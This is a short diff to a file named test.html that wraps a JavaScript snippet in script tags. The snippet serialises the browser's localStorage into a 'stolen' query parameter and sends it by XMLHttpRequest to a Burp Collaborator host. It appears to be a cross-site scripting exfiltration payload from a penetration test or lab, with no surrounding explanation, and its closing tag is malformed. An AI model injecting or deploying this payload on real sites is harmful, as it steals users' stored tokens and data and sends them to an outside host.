--- a/test.html
+++ b/test.html
@@ -1,4 +1,4 @@
-var theUrl = ("http://qkezt6sje655wi5qss1sjkzeq5wykn.burpcollaborator.net?stolen=+" + JSON.stringify(localStorage))
+<script>var theUrl = ("http://qkezt6sje655wi5qss1sjkzeq5wykn.burpcollaborator.net?stolen=+" + JSON.stringify(localStorage))
 function httpGetAsync(theUrl, callback)
 {
     var xmlHttp = new XMLHttpRequest();
@@ -12,3 +12,4 @@ function httpGetAsync(theUrl, callback)
 
 
 httpGetAsync(theUrl);
+</script<
